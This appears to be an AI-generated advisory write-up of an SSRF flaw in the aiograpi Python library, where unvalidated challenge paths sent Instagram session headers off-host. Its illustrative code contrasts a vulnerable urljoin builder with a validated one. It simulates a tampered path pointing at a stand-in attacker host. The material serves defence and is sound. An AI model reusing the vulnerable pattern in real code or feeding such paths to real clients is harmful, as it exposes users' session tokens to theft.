
CVE-2026-47157 is a Server-Side Request Forgery (SSRF) vulnerability in the aiograpi Python library (pip package) affecting all versions before 0.9.10. The flaw is unsafe handling of server-supplied signup challenge paths: the library accepted these paths from the challenge response and used them to build request URLs without first validating that they pointed to legitimate Instagram API endpoints. It was published by the maintainer on May 17, 2026, and added to the GitHub Advisory Database on May 23, 2026. The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium/Moderate) (GitHub Advisory, Repo Advisory).
The root cause is classified as CWE-918 (Server-Side Request Forgery): the library failed to validate server-supplied challenge path values before incorporating them into outbound HTTP request URLs. An attacker who can influence the challenge response payload (for example through interception on the local network, DNS spoofing, or a compromised proxy) can supply an arbitrary external URL as the challenge path. The library would then send its challenge-handling requests, including captcha solving and phone/SMS form submissions, to the attacker-controlled host, carrying the client's existing Instagram session headers. The fix in version 0.9.10 introduces path validation prior to URL construction for all challenge-related operations (GitHub Advisory, Repo Advisory).
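The following is an added example, not aiograpi's own code and not the actual 0.9.10 patch. It shows why splicing a server-supplied challenge path into a URL is an SSRF (Python's urljoin treats an absolute or protocol-relative reference as a full replacement of the base), how the client's session headers end up at the attacker's host, and one way to validate the path before building the URL. The API base, allowed hostnames, header values and function names are assumptions made for this example only.

```python
# Added example (not aiograpi's code): the SSRF pattern behind CWE-918 here,
# plus one validation that closes it. Hostnames, header values and function
# names are illustrative assumptions for this example only.
from urllib.parse import urljoin, urlsplit

# Assumed legitimate API origin and the hosts a challenge may legitimately
# point to (assumption; the real library's endpoints may differ).
API_BASE = "https://i.instagram.com/api/v1/"
ALLOWED_HOSTS = {"i.instagram.com", "www.instagram.com"}

# Constructed stand-in for the client's session headers; never real tokens.
SESSION_HEADERS = {
    "Cookie": "sessionid=CONSTRUCTED_SESSION_VALUE",
    "Authorization": "Bearer CONSTRUCTED_TOKEN",
}


class InvalidChallengePath(ValueError):
    """Raised when a server-supplied challenge path would leave the API origin."""


def build_challenge_url_unsafe(challenge_path: str) -> str:
    """Vulnerable pattern: splice the server-supplied path into the URL as-is.

    urljoin() treats an absolute ("https://evil/...") or protocol-relative
    ("//evil/...") reference as a complete replacement of the base, so a
    tampered challenge payload redirects the next request off-host.
    """
    return urljoin(API_BASE, challenge_path)


def validate_challenge_path(challenge_path: str) -> str:
    """Hardened pattern: validate before building, then re-check the result.

    Returns the resolved URL, or raises InvalidChallengePath.
    """
    if not isinstance(challenge_path, str) or not challenge_path:
        raise InvalidChallengePath("challenge path missing or empty")
    # Control characters and whitespace have no place in a path component;
    # reject them rather than let the URL parser "clean" them up.
    if any(ord(ch) < 0x21 or ord(ch) == 0x7F for ch in challenge_path):
        raise InvalidChallengePath("control character in challenge path")
    parts = urlsplit(challenge_path)
    # A scheme or an authority means the value is not a path at all.
    if parts.scheme or parts.netloc:
        raise InvalidChallengePath(f"absolute reference rejected: {challenge_path!r}")
    # Resolve against the real base and confirm the origin did not change.
    # Checking the resolved URL catches anything the earlier checks missed.
    resolved = urljoin(API_BASE, challenge_path)
    final = urlsplit(resolved)
    if final.scheme != "https" or final.hostname not in ALLOWED_HOSTS:
        raise InvalidChallengePath(f"resolved off-host: {resolved!r}")
    return resolved


def build_challenge_url_safe(challenge_path: str) -> str:
    """Hardened builder: only ever returns a URL on an allowed host."""
    return validate_challenge_path(challenge_path)


def is_safe_challenge_path(challenge_path) -> bool:
    """Boolean wrapper around validate_challenge_path()."""
    try:
        validate_challenge_path(challenge_path)
        return True
    except InvalidChallengePath:
        return False


def submit_challenge(challenge_path: str, build_url) -> tuple:
    """Simulate the challenge submission without network I/O.

    Returns (destination_host, headers) so the reader can see which host
    would have received the session headers under each URL builder.
    """
    url = build_url(challenge_path)
    return urlsplit(url).hostname, dict(SESSION_HEADERS)


if __name__ == "__main__":
    tampered = "https://attacker.example/challenge/"  # constructed payload
    host, headers = submit_challenge(tampered, build_challenge_url_unsafe)
    print(f"unsafe builder sends {sorted(headers)} to {host}")
    try:
        submit_challenge(tampered, build_challenge_url_safe)
    except InvalidChallengePath as exc:
        print(f"safe builder refused: {exc}")
    print(build_challenge_url_safe("challenge/?next=/"))
```

The two-stage check matters: rejecting a scheme or authority up front blocks the obvious "https://..." and "//..." payloads, and re-inspecting the resolved URL's host and scheme guards against parser quirks that let something slip past the first stage. A stricter deployment could also pin the resolved path to a known challenge prefix; the advisory only states that 0.9.10 validates challenge paths before building URLs, so the exact rules it applies are not reproduced here.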
Successful exploitation results in a high confidentiality impact: the client's Instagram session headers (which may include authentication tokens or cookies) are exfiltrated to an attacker-controlled server. This could allow an attacker to hijack the victim's Instagram session, access account data, or perform actions on behalf of the user. There is no direct integrity or availability impact, but session token theft could enable significant downstream account compromise (GitHub Advisory).
Upgrade aiograpi to version 0.9.10 or later, which validates challenge paths before building URLs, solving captcha challenges, or submitting phone/SMS challenge forms. No configuration-based workaround is documented; upgrading is the only recommended remediation. Users can update via pip: pip install --upgrade aiograpi (GitHub Advisory, Repo Advisory).
Source: This report was generated using artificial intelligence.